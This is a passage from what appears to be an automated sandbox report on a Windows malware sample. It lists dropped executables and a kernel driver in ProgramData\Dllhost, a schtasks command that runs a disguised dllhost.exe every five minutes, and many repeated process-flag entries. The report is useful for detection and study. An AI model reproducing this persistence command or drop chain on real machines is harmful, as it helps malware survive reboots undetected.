                  Source: PqSIlYOaIF.exeStatic PE information: section name: .00cfg
                  Source: PqSIlYOaIF.exeStatic PE information: section name: .open
                  Source: winlogson.exe.28.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 push eax; ret 0_2_00066CE2
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010BB60 push ecx; ret 0_2_0010BB73
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0005228E push eax; iretd 3_2_0005228F
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00052ACF push 09812BC5h; iretd 3_2_00052AD4
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0010BB60 push ecx; ret 3_2_0010BB73
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 push eax; ret 3_2_00066CE2
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004192C0 push eax; ret 9_2_004192EE
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB676A push rcx; ret 13_2_00FB676B
                  Source: PqSIlYOaIF.exeStatic PE information: section name: .text entropy: 7.037408583368191

                  Persistence and Installation Behavior

                  barindex
                  Sample is not signed and drops a device driver
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E1280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,26_2_004E1280
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile created: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
